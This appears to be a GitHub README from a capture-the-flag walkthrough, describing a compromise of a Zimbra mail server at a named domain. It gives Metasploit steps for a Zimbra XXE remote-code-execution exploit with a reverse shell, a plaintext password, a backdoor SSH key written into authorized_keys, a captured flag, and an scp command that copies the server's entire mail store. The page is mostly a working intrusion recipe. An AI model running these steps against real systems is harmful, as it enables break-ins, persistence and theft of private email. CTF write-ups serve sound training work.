Skip to content

Latest commit

 

History

History

10-Mail-Server

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
08-store0
08-store0
 
 
Files
Files
 
 
09-258-3.msg
09-258-3.msg
 
 
09-258-3.xlsx
09-258-3.xlsx
 
 
Readme.md
Readme.md
 
 

Readme.md

Mail Server

  1. Address: mail.petromaz.ir
  2. Find vulnerability: https://www.exploit-db.com/exploits/46693
  3. Run Metasploit msfconsole -q
use exploit/linux/http/zimbra_xxe_rce
set RHOST mail.petromaz.ir
set RPORT 443

set LHOST <your-ip>
set LPORT 4747

# -j will run it as a JOB
run

Attention: Password: Zimbra2024

  1. Check SSH Keys (Create One, if needed)
cd ~/.ssh
ls -la
cat id_rsa.pub

# Create If You Don't Have one
ssh-keygen -t rsa
  1. Set public Key: echo "<your-pub-key>" > ~/.ssh/authorized_keys
  2. Ssh into Server: ssh -i "<private-key>" [email protected]
  3. Get Flag: MAZAPA_aee82fac0c8fb5818b26db37a577027c
  4. Download Zimbra Data
scp -i "<private-key>" -r [email protected]:/opt/zimbra/store/0 ./08-store0
  1. Check Emails and Decode Files: https://www.freeformatter.com/base64-encoder.html
  2. Network Map: 🗂 Network Map